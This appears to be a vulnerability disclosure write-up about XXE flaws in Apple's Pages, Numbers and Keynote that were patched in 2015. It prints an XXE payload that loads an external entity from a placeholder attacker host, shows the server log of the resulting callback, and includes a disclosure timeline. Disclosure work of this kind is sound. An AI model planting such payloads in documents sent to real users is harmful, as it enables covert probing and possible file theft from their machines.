In June of 2015, Patrik Fehrenbach and I were able to identify a series of vulnerabilities in a few of Apple’s productivity applications: Pages, Numbers, as well as Keynote available for OS X and iOS 8.x (or older). In short, the application failed to validate the input while parsing a document.
While looking at these three applications, they all have on thing in common: They are made of different xml files once they have been unpacked. Lets start with Apple Pages.
Archive: xxe.docx inflating: [Content_Types].xml creating: _rels/ inflating: _rels/.rels creating: docProps/ inflating: docProps/app.xml inflating: docProps/core.xml inflating: docProps/thumbnail.jpeg creating: word/ creating: word/_rels/ inflating: word/_rels/document.xml.rels inflating: word/document.xml inflating: word/fontTable.xml inflating: word/settings.xml inflating: word/styles.xml inflating: word/stylesWithEffects.xml creating: word/theme/ inflating: word/theme/theme1.xml inflating: word/webSettings.xml
Each xml file shown in the list above has a part in the makings of the docx document. But the most important files that got our attention were
docProps/app.xml docProps/core.xml word/document.xml
From my understanding the app.xml file stores app version used and company information. The core.xml file contains the info about the system such as the user who created the file, the date, time, and etc. The document.xml file contains the data inserted inside the document. Now inserting an XXE payload into any of those (or all just for fun) will force Apple Pages to crash however, the XML is still getting parsed. For this example we’ll use the following payload:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE r [<!ELEMENT r ANY > <!ENTITY % sp SYSTEM "IP:PORT/somefile.xml" %sp;%param1;]>
and we can now save the file, and pack it again. If the file is opened with MS Word we’ll get told that the file is corrupted and the same thing would happen with Apple Pages, but in the background we’ll get this hit on our server:
SomeIP - - [24/Jun/2015 03:09:41] "GET /somefile.xml HTTP/1.1" 200 -
So what is exactly happening?
This is also exploitable on iOS 8.x by sending the file to an iPhone or an iPad when the file is processed by Pages.
Now that we have successfully exploited this on Apple pages, Are the other 2 exploitable as well?
Numbers and Keynote
The same method demonstrated for Apple Pages applies to the Apple Numbers and Keynote.
Injecting the same payload into the above mentioned files, will result into the same behavior. However this is also exploitable if it is opened on an iPhone or iPad (iOs 8).
7/23/2015 – Apple Pages’ Vulnerability report sent
7/23/2015 – Automated reply from Apple
8/25/2015 – Requested an updated – No answer
9/14/2015 – Requested another update –
9/14/2015 – Apple acknowledged the vulnerability + Patch to be released soon
9/15/215 – Apple Keynote’s Vulnerability report sent
9/16/2015 – Automated reply from Apple
9/17/215 – Apple Number’s Vulnerability report sent
9/18/2015 – Automated reply from Apple
9/25/2015 – Requested Update – Still working
10/4/2015 – Issue resolved by Apple
10/15/2015- CVE Assigned